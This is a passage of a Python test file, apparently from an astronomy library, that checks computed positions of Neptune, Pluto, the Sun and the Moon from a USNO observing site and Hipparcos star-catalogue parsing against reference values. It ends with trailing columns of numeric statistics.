compare(alt.degrees, (49.06396822144731, -37.0259637798912, -29.175475562665554, -14.5260443119261), 0.001 * arcsecond)
compare(az.degrees, (156.65256040205296, 91.80748703145906, 88.85671230431439, 74.60219420538265), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (49.078192535060566, -37.0259637798912, -29.175475562665554, -14.5260443119261), 0.001 * arcsecond)
compare(az.degrees, (156.65256040205296, 91.80748703145906, 88.85671230431439, 74.60219420538265), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (49.07833699756142, -37.0259637798912, -29.175475562665554, -14.5260443119261), 0.001 * arcsecond)
compare(az.degrees, (156.65256040205296, 91.80748703145906, 88.85671230431439, 74.60219420538265), 0.001 * arcsecond)
def test_neptune_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.neptune).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 15.637396931781986, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.680489951171502, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.608492665044128, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.583829722494027, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 4.86937782636538, 0.001 * arcsecond)
compare(az.degrees, 117.29043762875409, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 5.031511017145419, 0.001 * arcsecond)
compare(az.degrees, 117.29043762875409, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 5.033116634143141, 0.001 * arcsecond)
compare(az.degrees, 117.29043762875409, 0.001 * arcsecond)
def test_neptune_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.neptune).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 19.036514568239326, 0.001 * ra_arcsecond)
compare(dec.degrees, -21.792523874854822, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 19.027165016434417, 0.001 * ra_arcsecond)
compare(dec.degrees, -21.808061138689617, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -40.43318694811052, 0.001 * arcsecond)
compare(az.degrees, 86.51833613444356, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -40.43318694811052, 0.001 * arcsecond)
compare(az.degrees, 86.51833613444356, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -40.43318694811052, 0.001 * arcsecond)
compare(az.degrees, 86.51833613444356, 0.001 * arcsecond)
def test_neptune_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.neptune).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 20.362478654099593, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.213665913911328, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 20.36219137258442, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.21325376377245, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -21.102154672787563, 0.001 * arcsecond)
compare(az.degrees, 98.14962081515444, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -21.102154672787563, 0.001 * arcsecond)
compare(az.degrees, 98.14962081515444, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -21.102154672787563, 0.001 * arcsecond)
compare(az.degrees, 98.14962081515444, 0.001 * arcsecond)
def test_neptune_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.neptune).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 22.252831344843074, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.502690543226894, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 22.26432121506238, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.437371208596403, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 2.41678290499992, 0.001 * arcsecond)
compare(az.degrees, 106.8092597257607, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 2.6713913487620147, 0.001 * arcsecond)
compare(az.degrees, 106.8092597257607, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 2.6738334093305696, 0.001 * arcsecond)
compare(az.degrees, 106.8092597257607, 0.001 * arcsecond)
def test_neptune_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.neptune).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (15.637396931781986, 19.036514568239326, 20.362478654099593, 22.252831344843074), 0.001 * ra_arcsecond)
compare(dec.degrees, (-17.680489951171502, -21.792523874854822, -19.213665913911328, -11.502690543226894), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (15.608492665044128, 19.027165016434417, 20.36219137258442, 22.26432121506238), 0.001 * ra_arcsecond)
compare(dec.degrees, (-17.583829722494027, -21.808061138689617, -19.21325376377245, -11.437371208596403), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (4.86937782636538, -40.43318694811052, -21.102154672787563, 2.41678290499992), 0.001 * arcsecond)
compare(az.degrees, (117.29043762875409, 86.51833613444356, 98.14962081515444, 106.8092597257607), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (5.031511017145419, -40.43318694811052, -21.102154672787563, 2.6713913487620147), 0.001 * arcsecond)
compare(az.degrees, (117.29043762875409, 86.51833613444356, 98.14962081515444, 106.8092597257607), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (5.033116634143141, -40.43318694811052, -21.102154672787563, 2.6738334093305696), 0.001 * arcsecond)
compare(az.degrees, (117.29043762875409, 86.51833613444356, 98.14962081515444, 106.8092597257607), 0.001 * arcsecond)
def test_pluto_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.pluto).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.015146948702718, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.622956629676764, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 11.989238323883423, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.792209116103148, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 64.72856074651983, 0.001 * arcsecond)
compare(az.degrees, 147.2138070056058, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 64.73630449169308, 0.001 * arcsecond)
compare(az.degrees, 147.2138070056058, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 64.73638314930092, 0.001 * arcsecond)
compare(az.degrees, 147.2138070056058, 0.001 * arcsecond)
def test_pluto_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.pluto).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 15.216666873470118, 0.001 * ra_arcsecond)
compare(dec.degrees, -1.335915234746897, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.208587498665665, 0.001 * ra_arcsecond)
compare(dec.degrees, -1.3022917220648205, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 16.233734452123414, 0.001 * arcsecond)
compare(az.degrees, 105.3994365631196, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 16.28889280191291, 0.001 * arcsecond)
compare(az.degrees, 105.3994365631196, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 16.289451329649054, 0.001 * arcsecond)
compare(az.degrees, 105.3994365631196, 0.001 * arcsecond)
def test_pluto_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.pluto).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 16.761532920101487, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.396347593297179, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 16.76128368305737, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.39433478419375, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 22.700996363632996, 0.001 * arcsecond)
compare(az.degrees, 127.81134408260581, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 22.739821647292274, 0.001 * arcsecond)
compare(az.degrees, 127.81134408260581, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 22.74021541578692, 0.001 * arcsecond)
compare(az.degrees, 127.81134408260581, 0.001 * arcsecond)
def test_pluto_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.pluto).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.488579709427018, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.551785355075808, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.501344365322606, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.541283736216652, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 28.33982206878914, 0.001 * arcsecond)
compare(az.degrees, 157.51785266272373, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 28.370071242061236, 0.001 * arcsecond)
compare(az.degrees, 157.51785266272373, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 28.370378222043662, 0.001 * arcsecond)
compare(az.degrees, 157.51785266272373, 0.001 * arcsecond)
def test_pluto_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.pluto).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.015146948702718, 15.216666873470118, 16.761532920101487, 18.488579709427018), 0.001 * ra_arcsecond)
compare(dec.degrees, (16.622956629676764, -1.335915234746897, -11.396347593297179, -19.551785355075808), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (11.989238323883423, 15.208587498665665, 16.76128368305737, 18.501344365322606), 0.001 * ra_arcsecond)
compare(dec.degrees, (16.792209116103148, -1.3022917220648205, -11.39433478419375, -19.541283736216652), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (64.72856074651983, 16.233734452123414, 22.700996363632996, 28.33982206878914), 0.001 * arcsecond)
compare(az.degrees, (147.2138070056058, 105.3994365631196, 127.81134408260581, 157.51785266272373), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (64.73630449169308, 16.28889280191291, 22.739821647292274, 28.370071242061236), 0.001 * arcsecond)
compare(az.degrees, (147.2138070056058, 105.3994365631196, 127.81134408260581, 157.51785266272373), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (64.73638314930092, 16.289451329649054, 22.74021541578692, 28.370378222043662), 0.001 * arcsecond)
compare(az.degrees, (147.2138070056058, 105.3994365631196, 127.81134408260581, 157.51785266272373), 0.001 * arcsecond)
def test_sun_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.sun).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 8.02959789881544, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.496678572125123, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 8.000015838288707, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.584000539289498, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 46.72403357148823, 0.001 * arcsecond)
compare(az.degrees, 258.5550717845957, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 46.73947196634687, 0.001 * arcsecond)
compare(az.degrees, 258.5550717845957, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 46.73962875307724, 0.001 * arcsecond)
compare(az.degrees, 258.5550717845957, 0.001 * arcsecond)
def test_sun_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.sun).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 3.7755906381611175, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.90505409109931, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 3.7664985705990794, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.87762515818775, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 2.2209469369832533, 0.001 * arcsecond)
compare(az.degrees, 293.95636637272145, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 2.4868409787793837, 0.001 * arcsecond)
compare(az.degrees, 293.95636637272145, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 2.489379891081029, 0.001 * arcsecond)
compare(az.degrees, 293.95636637272145, 0.001 * arcsecond)
def test_sun_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.sun).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.752264357691004, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.03532101826747, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.751976099155204, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.03404957045815, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -5.486505415022805, 0.001 * arcsecond)
compare(az.degrees, 115.32008451470392, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -5.486505415022805, 0.001 * arcsecond)
compare(az.degrees, 115.32008451470392, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -5.486505415022805, 0.001 * arcsecond)
compare(az.degrees, 115.32008451470392, 0.001 * arcsecond)
def test_sun_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.sun).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 10.267679924967121, 0.001 * ra_arcsecond)
compare(dec.degrees, 10.752399537108259, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 10.279138748598198, 0.001 * ra_arcsecond)
compare(dec.degrees, 10.686961444410377, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -2.738407691502772, 0.001 * arcsecond)
compare(az.degrees, 286.09632001391725, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -2.738407691502772, 0.001 * arcsecond)
compare(az.degrees, 286.09632001391725, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -2.738407691502772, 0.001 * arcsecond)
compare(az.degrees, 286.09632001391725, 0.001 * arcsecond)
def test_sun_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.sun).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (8.02959789881544, 3.7755906381611175, 18.752264357691004, 10.267679924967121), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.496678572125123, 19.90505409109931, -23.03532101826747, 10.752399537108259), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (8.000015838288707, 3.7664985705990794, 18.751976099155204, 10.279138748598198), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.584000539289498, 19.87762515818775, -23.03404957045815, 10.686961444410377), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (46.72403357148823, 2.2209469369832533, -5.486505415022805, -2.738407691502772), 0.001 * arcsecond)
compare(az.degrees, (258.5550717845957, 293.95636637272145, 115.32008451470392, 286.09632001391725), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (46.73947196634687, 2.4868409787793837, -5.486505415022805, -2.738407691502772), 0.001 * arcsecond)
compare(az.degrees, (258.5550717845957, 293.95636637272145, 115.32008451470392, 286.09632001391725), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (46.73962875307724, 2.489379891081029, -5.486505415022805, -2.738407691502772), 0.001 * arcsecond)
compare(az.degrees, (258.5550717845957, 293.95636637272145, 115.32008451470392, 286.09632001391725), 0.001 * arcsecond)
def test_moon_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.moon).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.489955349304845, 0.001 * ra_arcsecond)
compare(dec.degrees, -5.189705732227236, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 12.463855411284248, 0.001 * ra_arcsecond)
compare(dec.degrees, -5.022075882872161, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 41.92040135025528, 0.001 * arcsecond)
compare(az.degrees, 151.19707488767745, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 41.938650930940234, 0.001 * arcsecond)
compare(az.degrees, 151.19707488767745, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 41.938836248377605, 0.001 * arcsecond)
compare(az.degrees, 151.19707488767745, 0.001 * arcsecond)
def test_moon_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.moon).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 23.663473338211578, 0.001 * ra_arcsecond)
compare(dec.degrees, 1.227161288913488, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 23.655459675858083, 0.001 * ra_arcsecond)
compare(dec.degrees, 1.1749464194383863, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -47.74510120858602, 0.001 * arcsecond)
compare(az.degrees, 338.13295291812307, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -47.74510120858602, 0.001 * arcsecond)
compare(az.degrees, 338.13295291812307, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -47.74510120858602, 0.001 * arcsecond)
compare(az.degrees, 338.13295291812307, 0.001 * arcsecond)
def test_moon_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.moon).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 14.845679251156893, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.590214641232205, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 14.845444624832663, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.58799188846256, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 36.381265580736255, 0.001 * arcsecond)
compare(az.degrees, 156.2971102404744, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 36.40348032108563, 0.001 * arcsecond)
compare(az.degrees, 156.2971102404744, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 36.403705864717445, 0.001 * arcsecond)
compare(az.degrees, 156.2971102404744, 0.001 * arcsecond)
def test_moon_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.moon).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 16.380804513901573, 0.001 * ra_arcsecond)
compare(dec.degrees, -21.79048462924397, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 16.393647715389825, 0.001 * ra_arcsecond)
compare(dec.degrees, -21.81897641768761, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 28.439387966372543, 0.001 * arcsecond)
compare(az.degrees, 191.29497427201525, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 28.46951344291743, 0.001 * arcsecond)
compare(az.degrees, 191.29497427201525, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 28.46981916998486, 0.001 * arcsecond)
compare(az.degrees, 191.29497427201525, 0.001 * arcsecond)
def test_moon_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.moon).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.489955349304845, 23.663473338211578, 14.845679251156893, 16.380804513901573), 0.001 * ra_arcsecond)
compare(dec.degrees, (-5.189705732227236, 1.227161288913488, -11.590214641232205, -21.79048462924397), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (12.463855411284248, 23.655459675858083, 14.845444624832663, 16.393647715389825), 0.001 * ra_arcsecond)
compare(dec.degrees, (-5.022075882872161, 1.1749464194383863, -11.58799188846256, -21.81897641768761), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (41.92040135025528, -47.74510120858602, 36.381265580736255, 28.439387966372543), 0.001 * arcsecond)
compare(az.degrees, (151.19707488767745, 338.13295291812307, 156.2971102404744, 191.29497427201525), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (41.938650930940234, -47.74510120858602, 36.40348032108563, 28.46951344291743), 0.001 * arcsecond)
compare(az.degrees, (151.19707488767745, 338.13295291812307, 156.2971102404744, 191.29497427201525), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (41.938836248377605, -47.74510120858602, 36.403705864717445, 28.46981916998486), 0.001 * arcsecond)
compare(az.degrees, (151.19707488767745, 338.13295291812307, 156.2971102404744, 191.29497427201525), 0.001 * arcsecond)
def test_hipparcos_conversion0():
line = 'H| 11767| |02 31 47.08|+89 15 50.9| 1.97|1|H|037.94614689|+89.26413805| | 7.56| 44.22| -11.74| 0.39| 0.45| 0.48| 0.47| 0.55|-0.16| 0.05| 0.27|-0.01| 0.08| 0.05| 0.04|-0.12|-0.09|-0.36| 1| 1.22| 11767| 2.756|0.003| 2.067|0.003| | 0.636|0.003|T|0.70|0.00|L| | 2.1077|0.0021|0.014|102| | 2.09| 2.13| 3.97|P|1|A|02319+8915|I| 1| 1| | | | | | | | | |S| |P| 8890|B+88 8 | | |0.68|F7:Ib-IIv SB|G\n'
star = hipparcos.parse(line)
compare(star.ra.hours, 2.530301023497941, 0.001 * ra_arcsecond)
compare(star.dec.degrees, 89.26410950742938, 0.001 * arcsecond)
ra, dec, distance = de405.earth(tt=2440423.345833333).observe(star).radec()
compare(ra.hours, 2.5283697000528966, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26420852419295, 0.001 * arcsecond)
def test_hipparcos_conversion1():
line = 'H| 11767| |02 31 47.08|+89 15 50.9| 1.97|1|H|037.94614689|+89.26413805| | 7.56| 44.22| -11.74| 0.39| 0.45| 0.48| 0.47| 0.55|-0.16| 0.05| 0.27|-0.01| 0.08| 0.05| 0.04|-0.12|-0.09|-0.36| 1| 1.22| 11767| 2.756|0.003| 2.067|0.003| | 0.636|0.003|T|0.70|0.00|L| | 2.1077|0.0021|0.014|102| | 2.09| 2.13| 3.97|P|1|A|02319+8915|I| 1| 1| | | | | | | | | |S| |P| 8890|B+88 8 | | |0.68|F7:Ib-IIv SB|G\n'
star = hipparcos.parse(line)
compare(star.ra.hours, 2.530301023497941, 0.001 * ra_arcsecond)
compare(star.dec.degrees, 89.26410950742938, 0.001 * arcsecond)
ra, dec, distance = de405.earth(tt=2448031.5).observe(star).radec()
compare(ra.hours, 2.529691010447949, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26413900274704, 0.001 * arcsecond)
def test_hipparcos_conversion2():
line = 'H| 11767| |02 31 47.08|+89 15 50.9| 1.97|1|H|037.94614689|+89.26413805| | 7.56| 44.22| -11.74| 0.39| 0.45| 0.48| 0.47| 0.55|-0.16| 0.05| 0.27|-0.01| 0.08| 0.05| 0.04|-0.12|-0.09|-0.36| 1| 1.22| 11767| 2.756|0.003| 2.067|0.003| | 0.636|0.003|T|0.70|0.00|L| | 2.1077|0.0021|0.014|102| | 2.09| 2.13| 3.97|P|1|A|02319+8915|I| 1| 1| | | | | | | | | |S| |P| 8890|B+88 8 | | |0.68|F7:Ib-IIv SB|G\n'
star = hipparcos.parse(line)
compare(star.ra.hours, 2.530301023497941, 0.001 * ra_arcsecond)
compare(star.dec.degrees, 89.26410950742938, 0.001 * arcsecond)
ra, dec, distance = de405.earth(tt=2451545.0).observe(star).radec()
compare(ra.hours, 2.5302921836971946, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26411033462212, 0.001 * arcsecond)
def test_hipparcos_conversion3():
line = 'H| 11767| |02 31 47.08|+89 15 50.9| 1.97|1|H|037.94614689|+89.26413805| | 7.56| 44.22| -11.74| 0.39| 0.45| 0.48| 0.47| 0.55|-0.16| 0.05| 0.27|-0.01| 0.08| 0.05| 0.04|-0.12|-0.09|-0.36| 1| 1.22| 11767| 2.756|0.003| 2.067|0.003| | 0.636|0.003|T|0.70|0.00|L| | 2.1077|0.0021|0.014|102| | 2.09| 2.13| 3.97|P|1|A|02319+8915|I| 1| 1| | | | | | | | | |S| |P| 8890|B+88 8 | | |0.68|F7:Ib-IIv SB|G\n'
star = hipparcos.parse(line)
compare(star.ra.hours, 2.530301023497941, 0.001 * ra_arcsecond)
compare(star.dec.degrees, 89.26410950742938, 0.001 * arcsecond)
ra, dec, distance = de405.earth(tt=2456164.5).observe(star).radec()
compare(ra.hours, 2.5311170753257395, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26406913848278, 0.001 * arcsecond)
def test_hipparcos_conversion4():
line = 'H| 11767| |02 31 47.08|+89 15 50.9| 1.97|1|H|037.94614689|+89.26413805| | 7.56| 44.22| -11.74| 0.39| 0.45| 0.48| 0.47| 0.55|-0.16| 0.05| 0.27|-0.01| 0.08| 0.05| 0.04|-0.12|-0.09|-0.36| 1| 1.22| 11767| 2.756|0.003| 2.067|0.003| | 0.636|0.003|T|0.70|0.00|L| | 2.1077|0.0021|0.014|102| | 2.09| 2.13| 3.97|P|1|A|02319+8915|I| 1| 1| | | | | | | | | |S| |P| 8890|B+88 8 | | |0.68|F7:Ib-IIv SB|G\n'
star = hipparcos.parse(line)
compare(star.ra.hours, 2.530301023497941, 0.001 * ra_arcsecond)
compare(star.dec.degrees, 89.26410950742938, 0.001 * arcsecond)
ra, dec, distance = de405.earth(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5]).observe(star).radec()
compare(ra.hours, (2.5283697000528966, 2.529691010447949, 2.5302921836971946, 2.5311170753257395), 0.001 * ra_arcsecond)
compare(dec.degrees, (89.26420852419295, 89.26413900274704, 89.26411033462212, 89.26406913848278), 0.001 * arcsecond)
| 46.212027
| 464
| 0.707296
| 17,884
| 134,477
| 5.24754
| 0.0638
| 0.037082
| 0.081867
| 0.077019
| 0.856373
| 0.839665
| 0.827506
| 0.79164
| 0.74127
| 0.64944
| 0
| 0.322831
| 0.151714
| 134,477
| 2,909
| 465
| 46.227913
| 0.499847
| 0.001138
| 0
| 0.522381
| 1
| 0.002238
| 0.032169
| 0.005075
| 0
| 0
| 0
| 0.000344
| 0.000895
| 1
| 0.091764
| false
| 0
| 0.003581
| 0
| 0.095345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
